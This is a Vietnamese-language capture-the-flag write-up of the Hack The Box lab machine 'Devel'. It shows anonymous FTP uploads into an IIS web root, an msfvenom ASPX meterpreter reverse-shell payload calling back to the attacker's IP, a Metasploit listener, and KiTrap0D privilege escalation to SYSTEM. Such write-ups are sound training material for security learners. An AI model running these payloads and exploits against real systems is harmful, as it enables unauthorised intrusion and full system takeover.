Hack The Box – Devel

Hack The Box – Devel

Hack The Box (HTB) là một nền tảng trực tuyến cho phép bạn kiểm tra kỹ năng và kiểm tra thâm nhập của mình. Nó chứa một số thách thức được cập nhật liên tục. Một số trong chúng mô phỏng các kịch bản tấn công trong thế giới thực và trong số chúng nghiêng về phía thách thức theo kiểu CTF.

Devel được mô tả là một hộp tương đối đơn giản thể hiện các rủi ro bảo mật liên quan đến một số cấu hình chương trình mặc định. Nó là một máy tính cấp độ cho người mới bắt đầu và có thể được hoàn thành bằng cách sử dụng khai thác công khai.

Chúng tôi sẽ sử dụng các công cụ sau đây để thâm nhập dựa Kali Linux .

Step 1 – Scanning the network

Bước đầu tiên trước khi khai thác là thực hiện scan và tham dò

Đây là một trong những phần quan trọng nhất vì nó sẽ xác định những gì bạn có thể khai thác sau đó. Luôn luôn tốt hơn để dành nhiều thời gian hơn cho giai đoạn đó để có được càng nhiều thông tin càng tốt.

Tôi sẽ sử dụng Nmap (Network Mapper), một tiện ích nguồn mở và miễn phí để khám phá mạng và kiểm tra bảo mật. Nó sử dụng các IP packet để xác định máy chủ nào có sẵn trên mạng, dịch vụ nào mà máy chủ đó đang cung cấp, hệ điều hành nào đang chạy, loại tường lửa nào đang được sử dụng và hàng tá các đặc điểm khác.

Có nhiều lệnh bạn có thể sử dụng với công cụ này để quét mạng. Nếu bạn muốn tìm hiểu thêm về nó, bạn có thể xem tài liệu ở đây.

Tôi sử dụng lệnh sau để có được những thứ cơ bản về những gì chúng ta đang quét

nmap -sV -O -F --version-light 10.10.10.5

-sV: Thăm dò các cổng mở để xác định thông tin dịch vụ / phiên bản
-O: Cho phép phát hiện hệ điều hành
-F: Chế độ nhanh – Quét ít cổng hơn so với quét mặc định
–version-light: Giới hạn ở các đầu dò có khả năng nhất (cường độ 2)

10.10.10.5: Địa chỉ IP của HTB Devel

Bạn cũng có thể sử dụng Zenmap, là GUI quét của Nmap Security Scanner chính thức. Đây là một ứng dụng đa nền tảng, miễn phí và mã nguồn mở nhằm mục đích giúp Nmap dễ dàng cho người mới bắt đầu sử dụng đồng thời cung cấp các tính năng nâng cao cho người dùng Nmap có kinh nghiệm.

Tôi sử dụng một nhóm lệnh khác để thực hiện quét chuyên sâu

nmap -A -v 10.10.10.5
-A: Cho phép phát hiện hệ điều hành, phát hiện phiên bản
-v: Tăng mức độ chi tiết
10.10.10.5: IP address of the Lame box

Chúng ta có thể thấy rằng có 2 cổng mở:
Port 21. Điều khiển Giao thức truyền tệp (FTP) (lệnh). Đây là Microsoft FTP
Port 80 .Giao thức truyền siêu văn bản (HTTP). Đây là một máy chủ IIS

Step 2 – The vulnerable FTP

Chúng tôi mở Firefox và truy cập trang web tại http://10.10.10.5

Từ giai đoạn này , chúng tôi đã tìm thấy 2 tệp trong Microsoft FTP. Hãy xem liệu chúng ta có thể truy cập chúng từ trình duyệt.

http://10.10.10.5/welcome.png

Tôi cũng có thể truy cập trang iisstart.htm

http://10.10.10.5/iisstart.htm

Bây giờ chúng ta biết hai điều:

  • FTP được sử dụng làm thư mục tệp cho máy chủ web – được phát hiện khi chúng tôi truy cập các tệp từ giai đoạn trên
  • FTP cho phép đăng nhập ẩn danh – được phát hiện khi chúng tôi thực hiện scan rất nhiều

Hãy xem liệu chúng ta có thể tạo một tệp và thêm nó vào FTP không

Tôi tạo một tệp bằng cách sử dụng lệnh này và xuất kết quả cho một tệp có tên htb.html

echo HackTheBox > htb.html

Bây giờ chúng ta hãy kết nối với FTP để thêm tệp mới tạo của chúng tôi

Để kết nối với FTP, tôi sử dụng lệnh này

ftp 10.10.10.5

Tôi login bằng anonymous làm tên người dùng và chỉ cần nhấn enter để lấy mật khẩu, vì nó cho phép đăng nhập ẩn danh.

Tôi thêm tệp trên FTP bằng lệnh này

put htb.html

Các tập tin đã được gửi thành công. Hãy kiểm tra xem chúng tôi có thể truy cập nó từ Firefox không. Tôi truy cập trang và chúng ta có thể thấy HackTheBox đầu ra trên trang web.

http://10.10.10.5/htb.html

Step 3 – Using MSFvenom to craft an exploit

Nhưng trước tiên, hãy kiểm tra Metasploit Framework mà chúng ta sẽ cần để khai thác.

Chúng ta biết rằng chúng ta cần tạo một reverse shell, đó là một loại shell trong đó máy chủ mục tiêu liên lạc với máy tấn công. Máy chủ tấn công có một cổng nghe mà nó nhận được kết nối, bằng cách sử dụng, thực thi mã hoặc lệnh.

Từ trang web Offensive Security, chúng tôi có được định nghĩa này cho Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memoryDLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Tôi khởi chạy Metasploit và tìm kiếm các reverse TCP payloads.. Tôi sử dụng lệnh sau

search windows/meterpreter/reverse_tcp
payload/windows/meterpreter/reverse_tcp

Bây giờ chúng ta hãy quay trở lại msfvenom để khai thác. Và đặc biệt hơn là một reverse shell aspx.

Tôi sử dụng lệnh sau

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use
-f: Output format
-0: Save the payload to a file
LHOST: Local host
LPORT: Local port

Hãy kết nối lại với FTP và gửi những món quá mà chúng ta chuẩn bị nảy giờ

put devel.aspx

Hãy kiểm tra xem tập tin đã được gửi chính xác chưa. Quay trở lại Firefox, tôi điều hướng đến máy chủ FTP bằng lệnh sau

ftp://10.10.10.5

Step 4 – Setting up a listener with Metasploit

Chúng ta quay lại Metasploit

use exploit/multi/handler

Tôi kiểm tra xem các tùy chọn có sẵn

Trước tiên chúng tôi thiết lập Payload

set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.15
set lport 4444

Sau khi thông báo này xuất hiện

Started reverse TCP handler on 10.10.14.15:4444

hãy quay lại trình duyệt và truy cập trang nơi lưu trữ tập lệnh độc hại chúng ta đã put lên

http://10.10.10.5/devel.aspx

Bây giờ tôi có một session

search -f user.txt

Không có tập tin phù hợp với tìm kiếm của tôi. Tôi thử với. * Để xem các tệp khác, nhưng không có gì hữu ích

Sau đó tôi tạo một shell với lệnh sau

shell

Tôi sử dụng lệnh sau để có được thông tin hệ thống

systeminfo

Chúng ta có thể thấy rằng chủ sở hữu đã đăng ký được gọi là babis. Đây có thể là một thông tin quan trọng khi chúng ta sẽ tìm kiếm người dùng. Chúng ta cũng có thể thấy rằng máy chủ không có bất kỳ hotfix nào.

Tôi bắt đầu điều hướng qua các thư mục. Tôi sử dụng dir để liệt kê tất cả các tập tin / thư mục và cd để thay đổi thư mục. Tôi thử vận may của mình trên các thư mục babis và Administrator, nhưng cả hai đều cho tôi quyền truy cập bị từ chối.

Chúng ta cần leo thang đặc quyền! Biết rằng khi chúng tôi kiểm tra thông tin hệ thống, không tìm thấy hotfix nào

Step 5 – Performing Privilege Escalation

background

Sau đó tôi sử dụng lệnh sau :
use post/multi/recon/local_exploit_suggester

Module này gợi ý các Meterpreter exploits có thể được sử dụng. Các khai thác được đề xuất dựa trên kiến trúc và nền tảng mà người dùng đã mở shell cũng như các khai thác có sẵn trong Meterpreter

Tôi kiểm tra các tùy chọn và tôi đặt phiên

Đi xuống danh sách bên dưới :

exploit/windows/local/bypassuac_eventvwr

không thành công do người dùng IIS không thuộc nhóm quản trị viên, đây là mặc định và được mong đợi.

use exploit/windows/local/ms10_015_kitrap0d

Module này sẽ tạo một phiên mới với các đặc quyền HỆ THỐNG thông qua khai thác KiTrap0D của Tavis Ormandy. Nếu phiên sử dụng đã được nâng lên thì việc khai thác sẽ không chạy. Module này dựa trên kitrap0d.x86.dll và không được hỗ trợ trên các phiên bản x64 của Windows.

Khi chúng tôi chạy sysinfo trong phiên Meterpreter, nó đã tiết lộ rằng mục tiêu là kiến trúc x86

Tôi kiểm tra các tùy chọn và sau đó thiết lập phiên

vậy là khai thác đã thành công, nhưng phiên không thể được tạo ra. Điều này là do dòng đầu tiên trong khai thác cố gắng thiết lập trình xử lý ngược trên cổng mặc định eth0 và cổng mặc định, chứ không phải giao diện VPN cho các phòng thí nghiệm HTB.

Started reverse TCP handler on 10.0.2.15:4444

Tôi kiểm tra các tùy chọn và đặt LHOST và LPORT

Sau đó tôi kiểm tra tất cả các phiên còn sống bằng lệnh sau, trong trường hợp phiên của tôi chết

sessions -l

Step 6 – Looking for the user.txt flag

Trước tiên hãy kiểm tra xem chúng ta đang ở đâu với lệnh sau

pwd

Tôi di chuyển đến C: \ và ls tất cả các tệp / thư mục. Tôi đã biết nơi để tìm từ nỗ lực trước đây của mình trong Bước 4

sau tôi quay lại thư mục Người dùng


Sau đó di chuyển đến thư mục babis

Từ đó, tôi vào thư mục Desktop

Chúng tôi đã tìm thấy tệp user.txt.txt! Để đọc nội dung của tập tin tôi sử dụng lệnh

cat user.txt.txt

Step 7 – Looking for the root.txt flag

Quay trở lại C: \ để điều hướng đến thư mục Administrator sau đó là thư mục Desktop. Tôi sử dụng ls để liệt kê tất cả các tệp trong thư mục Desktop

Chúng tôi tìm thấy tệp root.txt.txt!

cat root.txt.txt

Congrats! You found both flags! 😀

Nguồn : https://freecodecamp.org